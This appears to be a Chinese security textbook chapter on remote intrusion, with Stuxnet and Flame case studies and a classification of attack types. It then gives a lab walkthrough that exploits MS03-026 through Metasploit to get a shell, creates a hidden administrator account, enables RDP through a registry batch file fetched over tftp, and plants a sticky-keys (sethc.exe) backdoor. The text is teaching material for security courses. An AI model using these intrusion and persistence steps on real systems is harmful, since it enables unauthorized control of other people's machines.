第6章 远程入侵

第6章

远程入侵

6.1远程入侵的分类6.2一次较为完整的远程入侵过程

6.3预留后门案例一：“震网”病毒奇袭伊朗核电站

2011年2月，伊朗突然宣布暂时卸载首座核电站——布什尔核电站的核燃料，西方国家也悄悄对伊朗核计划进展预测进行了重大修改。以色列战略事务部长摩西•亚阿隆在这之前称，伊朗至少需要3年才能制造出核弹。美国国务卿希拉里也轻描淡写地说，伊朗的计划因为“技术问题”已被拖延。 但就在几个月前，美国和以色列还在警告伊朗只需一年就能拥有快速制造核武器的能力，为什么会突然出现如此重大的变化？因为布什尔核电站遭到“震网”病毒攻击，1/5的离心机报废。自2010年8月该核电站启用后就发生连串故障，伊朗政府表面声称是天热所致，但真正原因却是核电站遭病毒攻击。一种名为“震网”（Stuxnet）的蠕虫病毒侵入了伊朗工厂企业，甚至进入西门子为核电站设计的工业控制软件，并可夺取对一系列核心生产设备尤其是核电设备的关键控制权。

2010年9月伊朗政府宣布，大约3万个网络终端感染“震网”，病毒攻击目标直指核设施。分析人士在猜测病毒研发者具有国家背景的同时，更认为这预示着网络战已发展到以破坏硬件为目的的新阶段。伊朗政府指责美国和以色列是“震网”的幕后主使。整个攻击过程如同科幻电影：由于被病毒感染，监控录像被篡改。监控人员看到的是正常画面，而实际上离心机在失控情况下不断加速而最终损毁。位于纳坦兹的约8000台离心机中有1000台在2009年底和2010年初被换掉。俄罗斯常驻北约代表罗戈津称：病毒给伊朗布什尔核电站造成严重影响，导致放射性物质泄漏，危害不亚于切尔诺贝利核电站事故。 微软调查结果显示：“震网”正在伊朗等中亚国家肆虐，发作频次越来越高，并有逐步向亚洲东部扩散的迹象。“震网”包含空前复杂的恶意代码，是一种典型的计算机病毒，能自我复制，并将副本通过网络传输，任何一台个人电脑只要和染毒电脑相连，自动传播给其他与之相连的电脑，最后造成大量网络流量的连锁效应，导致整个网络系统瘫痪。“震网”主要通过U盘和局域网进行传播，是第一个利用Windows的0day漏洞专门针对工业控制系统发动攻击的恶意软件，能够攻击石油运输管道、发电厂、大型通信设施、机场等多种工业和民用基础设施，被称为“网络导弹”。案例二：网络战病毒“火焰”现身美国

2012年6月，肆虐中东的计算机病毒“火焰”现身美国网络空间，甚至攻破了微软公司的安全系统。微软公司已经向用户提供了紧急的防火补丁。

微软公司发布警告称，“火焰”病毒的制作者已经找到使用微软安全系统来伪造安全证书的方法。这样，该病毒就能在不被防病毒软件发现的情况下任意传播。微软公司现已修补了安全漏洞，并将自己被攻破的安全证书列入“不受信任的”证书名单中。

微软公司表示，由于“火焰”是一种定向精确的高级病毒，包括美国政府和金融机构在内的绝大部分微软用户都不会被感染。但是，微软公司不得不采取行动，以防止“不老练”的网络攻击者效仿“火焰”技术进行漫无目标的广泛攻击。

目前还没有国家或组织对“火焰”病毒宣称负责，但此间媒体已开始热议美国与伊朗的网络战争。一些网络安全专家分析病毒代码后认为，“火焰”可能是针对伊朗网络战中的最新一波攻击，最可能由“某一富裕国家”研发，而据信美国和以色列的嫌疑最大。 俄罗斯卡巴斯基实验室则认为，“火焰”病毒结构的复杂性和攻击目标的选择性与此前出现的“震网”病毒极其相近，二者应“师出同门”。2010年7月，德国专家首先发现“震网”病毒，伊朗、印度尼西亚、印度等国部分电脑用户反映受到这种病毒攻击。该病毒对电脑的传染性很强，可严重威胁工业系统的安全。西方媒体当时普遍猜测“震网”病毒的目标是伊朗的布什尔核电站。思考

1、这两个案例中攻击者使用了哪些攻击技术？2、0day漏洞会产生什么后果？3、分析“震网”病毒是怎样传播的？有何危害？6.1远程入侵的分类

远程入侵是指攻击者利用服务器和操作系统存在的缺陷和安全漏洞，通过远程控制、上传病毒木马等手段控制服务器并得到数据的访问权限。攻击者在远程入侵成功后往往可以在用户不知情的情况下秘密窃取数据，也可以对数据进行恶意更改等操作

6.1远程入侵的分类

根据入侵对象的不同，可以把远程入侵分为以下几种类型

（1）个人上网电脑入侵通常利用个人电脑的各种系统漏洞和木马病毒，甚至利用社会工程学等手段实施入侵。（2）服务器入侵通常利用服务器的各种漏洞（0day漏洞、Web漏洞等）实施入侵。（3）无线网络入侵一种模式是以破解无线网络信号的访问密码达到“蹭网”的目的。RogueAP是另一种入侵模式，其方法是攻击者在无线网络中安放未经授权的AP或者客户机，提供对无线网络的开放式访问，无线网络用户在不知情的情况下以为自己通过很好的信号连入了Internet，却不知自己的各类敏感信息已经遭到了攻击者的监听，攻击者甚至可以将木马链接轻松插入用户访问的各个网址中。（4）工业控制系统入侵震网病毒是首个发现的专门针对西门子工业控制系统的病毒，曾经造成伊朗核电站推迟发电。这种针对工业控制系统的入侵一般带有军事目的，将成为未来战争中的一种重要武器。6.1远程入侵的分类

根据入侵策略的不同，可以把远程入侵分为以下几种类型：（1）主动定点式入侵从字面上很容易理解，这种入侵的目标非常明确。先确定远程入侵的对象，然后采取各种攻击手段获取攻击目标的系统控制权。主动定点式入侵的主要过程如下：身份隐藏->探测并确定攻击目标->远程登陆，然后获得攻击目标的控制权->远程控制->预留后门->消灭踪迹。（2）欺骗诱导式入侵不同于主动定点式入侵，这种入侵方式相对被动，一开始并没有明确的攻击目标，而是通过大量发送电子邮件或者通过QQ、MSN等聊天工具广泛发送信息，诱骗上网用户打开某个已经被挂马的网站链接、附件，或者下载某个已经被植入木马病毒的网络热门文件，一旦有用户中了木马，攻击者就可以随意控制该用户的计算机。6.1远程入侵的分类

以上几种类型并不是孤立的，而是通常交织在一起使用。有时是先通过主动定点式入侵，将某个用户访问量大的网站进行挂马，然后利用欺骗诱导式入侵，一旦有用户访问了该网站，而该用户的系统恰好又没有设置良好的安全保护机制时就很容易被入侵。有时是先通过个人上网电脑的入侵作为跳板，进一步针对内网服务器进行入侵，甚至是针对工业控制系统进行入侵。例如2010年在伊朗发生的“震网”病毒事件，先利用包括MS10-046、MS10-061、MS08-067等在内的7个最新漏洞进行攻击，这7个漏洞中5个针对Windows系统（其中4个属于0day漏洞），2个针对西门子公司控制系统，一旦侵入系统，自动化软件之间的通信将被病毒劫持，进而实现对工业控制系统的入侵

6.2一次较为完整的远程入侵过程

以入侵WindowsServer2003服务器为例，演示一次较为完整的远程入侵过程表6-1软件安装列表序号软件名称功能和作用1Metasploit缓冲区溢出攻击2Tftpd32tftp服务器33389.bat开启远程桌面4Windows自带远程桌面连接连接远程计算机桌面

HostOS（攻击方）GuestOS（受攻击方）操作系统WindowsXPSP3Windows2003标准版SP0IP地址安装软件Metasploit、tftpd32IIS

表6-2攻防实验配置3389.batechoWindowsRegistryEditorVersion5.00>>3389.regecho[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>>3389.regecho"fDenyTSConnections"=dword:00000000>>3389.regecho[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp]>>3389.regecho"PortNumber"=dword:00000d3d>>3389.regecho[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]>>3389.regecho"PortNumber"=dword:00000d3d>>3389.regregedit/s3389.regdel3389.reg

表6-33389.bat文件内容6.2一次较为完整的远程入侵过程

1、在攻击方的系统上安装Metasploit软件，在Windows程序列表中找到“Metasploit

3”，打开MetasploitConsole，如图6-1所示

图6-1MetasploitConsole主界面6.2一次较为完整的远程入侵过程

2、设置攻击参数，在命令提示符下依次输入以下命令：useexploit/windows/dcerpc/ms03_026_dcom//利用漏洞ms03_026实施入侵>setRHOST//设置远程入侵目标的ip地址>setPAYLOADwindows/shell/bind_tcp//设置获取目标主机shell的方式>exploit//输入exploit命令进行入侵图6-2成功获取远程主机的shell6.2一次较为完整的远程入侵过程

用ipconfig命令查看这台主机的IP，如图6-3所示图6-3远程主机的IP地址6.2一次较为完整的远程入侵过程

3、在远程主机上建立用户，并将该用户添加到管理员组，如图6-4所示，输入以下命令：>netuserzjbti$123/add//注意语法格式，123代表密码，后面有空格。>netlocalgroupadministratorszjbti$/add图6-4在远程主机上建立管理员用户6.2一次较为完整的远程入侵过程

4、输入netstat-an命令查看端口情况，该主机上远程桌面默认的3389端口没有打开，如图6-5所示。为了进一步控制远程主机，可以使用批处理文件3389.bat，使其在远程主机上运行并开启远程主机的远程桌面服务。图6-5查看端口情况6.2一次较为完整的远程入侵过程

为了将3389.bat文件上传到远程主机上并运行，可以在攻击方的系统上安装tftp32软件作为tftp服务端，将远程主机作为客户端，这样就可以从服务端来下载该文件，从而间接实现文件的上传。如图6-6、6-7所示，做好tftp服务端的设置和上传文件准备工作。图6-6Tftp软件设置图6-7Tftp文件下载列表6.2一次较为完整的远程入侵过程

如图6-8所示，输入如下命令：>tftpget3389.bat//从服务端下载3389.bat文件

>3389.bat//运行批处理文件并开启远程桌面服务

图6-8开启3389端口6.2一次较为完整的远程入侵过程

如图6-9所示，再次输入netstat-an命令查看端口情况，3389端口已经打开，可以使用远程桌面连接软件来连接远程主机了。图6-9查看3389端口是否打开6.2一次较为完整的远程入侵过程

5、运行windows自带远程桌面连接软件，如图6-10、6-11所示，填入相关信息。图6-11利用远程桌面连接软件登录系统图6-10远程桌面连接软件界面6.2一次较为完整的远程入侵过程

如图6-12所示，已经成功通过之前创建的zjbti$管理员账号登录远程系统，可以对远程主机进行各种操作了。图6-12登录成功6.2一次较为完整的远程入侵过程

在完整的远程入侵过程中，攻击者首先通过对远程主机操作系统存在的漏洞进行攻击而获得了远程主机的系统shell；其次，在远程主机上建立用户，并将该用户添加到管理员组；再次，使用tftp工具将3389.bat文件上传到远程主机并执行该文件打开远程主机的3389端口；最后使用远程桌面连接软件正常连接远程主机，从而实现了对远程主机的完全控制进行远程入侵的关键是识别远程主机操作系统存在的漏洞并获取系统shell，一旦获取了操作系统shell，可以通过打开危险端口、上传木马等诸多方法逐步获取系统的完整控制权。此外，除了使用windows自带的远程桌面工具连接远程主机外，还可以使用上兴远控、小熊远控、radmin、pcanywhere等木马或工具实现对目标主机的远程控制。6.3预留后门

后门，英文为backdoor。一台计算机上共有65536个端口（从0到65535），如果把计算机看作是一间屋子，那么这65536个端口就可以被看作是计算机为了与外界连接所开的65536扇门

每扇门都对应一项专门的事务，有的门是主人特地打开迎接客人的（提供服务），有的门是主人为了出去访问客人而开设的（访问远程服务）理论上剩下的其他门都该是关闭着的，但偏偏因为各种原因，有的门在主人不知道的情形下被悄然开启。于是就有好事者进入，主人的隐私被刺探，生活被打扰，甚至屋里的东西也被搞得一片狼藉。这扇悄然被开启的门就叫“后门”事实上除了通过端口连接外，也可以通过串/并口、无线设备连接的方式进行入侵

6.3预留后门

攻击者一旦远程入侵成功，一般都会通过预留后门的方式来保持对远程主机的长期控制

后门产生的必要条件有以下三点：（1）必须以某种方式与其他终端节点相连。由于后门的利用都是从其他节点进行访问，因此必须与目标主机使用双绞线、光纤、串/并口、蓝牙、红外等设备在物理信号上有所连接才可以对端口进行访问。只有访问成功，双方才可以进行信息交流，攻击方才有机会进行入侵。

（2）目标主机默认开放的可供外界访问的端口至少有1个。因为一台默认无任何端口开放的机器是无法连接通信的，而如果开放着的端口外界无法访问，则同样没有办法进行入侵。

（3）目标主机存在程序设计缺陷或人为疏忽，导致攻击者能以权限较高的身份执行程序。并不是任何一个权限的帐号都能够被利用的，只有权限达到操作系统一定要求的才允许执行对注册表和log日志等的相关修改

6.3预留后门

这里以Windows操作系统的“Shift后门”和Web应用的“海阳顶端木马后门”为例，下面介绍预留后门的方法

1、Shift后门（1）在Windows系统下，当连续按5下键盘上的“shift”键时，会弹出如图6-13所示的“粘滞键”对话框

图6-13弹出“粘滞键”对话框6.3预留后门

该“粘滞键”对应执行的是位于“C:\WINDOWS\system32”下的sethc.exe文件，如图6-14所示。

图6-14sethc文件位置6.3预留后门

（2）将同样位于该路径下的cmd.exe文件拷贝出来，并重命名为sethc.exe，然后将该文件复制到“C:\WINDOWS\system32”下，如图6-15所示，点击“是”，这样原来的sethc.exe文件实际被替换成了cmd.exe，当我们再次连续按5下键盘上的“shift”键时，弹出了命令行对话框，如图6-16所示。图6-15把cmd.exe文件重命名并覆盖sethc.exe文件6.3预留后门

（2）将同样位于该路径下的cmd.exe文件拷贝出来，并重命名为sethc.exe，然后将该文件复制到“C:\WINDOWS\system32”下，如图6-15所示，点击“是”，这样原来的sethc.exe文件实际被替换成了cmd.exe，当我们再次连续按5下键盘上的“shift”键时，弹出了命令行对话框，如图6-16所示。图6-15把cmd.exe文件重命名并覆盖sethc.exe文件6.3预留后门

图6-16弹出命令行对话框6.3预留后门

（3）在远程桌面的登录窗口，当我们同样连续按5下键盘上的“shift”键时，同样弹出了命令行对话框，如图6-17所示。如此，即使之前创建的登录用户被管理员删除，攻击者依然可以再次添加管理员用户，然后登录系统

。图